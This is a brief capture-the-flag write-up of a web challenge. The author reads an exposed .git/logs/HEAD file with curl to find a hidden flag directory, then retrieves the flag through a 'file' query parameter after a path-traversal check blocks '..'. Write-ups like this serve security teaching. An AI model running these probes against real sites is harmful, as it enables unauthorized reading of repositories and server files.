Rating:
If we visit the address, we will be greeted with what looks to be the source code for the page ?
```
```
If we trust that this is the actual code, then it looks like passing `file` as a query parameter might get us somewhere. In fact, this looks like an open invitation towards a [`directory travesal attack`](https://owasp.org/www-community/attacks/Path_Traversal). Only one problem - strings including `..` will not give us much, thanks to the `strpos()` check.
We do get another clue that becomes significant: `Locked down with version control`. Right, so is this an exposed git-repository?
```
$ curl http://challenges.ctfd.io:30595/.git/
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
You don't have permission to access this resource.
So `403 Forbidden` - just what we wanted to see! Well, we can't read the folder - but can we read the logs?
```
$ curl http://challenges.ctfd.io:30595/.git/logs/HEAD
0000000000000000000000000000000000000000 862ff4b638b509e5fe354d3a93e49712f0684887 Sucks At <[email protected]> 1615233879 +0000 commit (initial): not including flag directory 1a2220dd8c13c32e in the version control system
```
Seems the commit message might have what we are after `flag directory 1a2220dd8c13c32e`. So lets try it!
```
curl http://challenges.ctfd.io:30595/?file=/1a2220dd8c13c32e/flag.txt
UDCTF{h4h4_suck3rs_i_t0tally_l0ck3d_th1s_down}
.
.
plus a bunch of HTML that is irrelevant to us right now :)
.
.
```
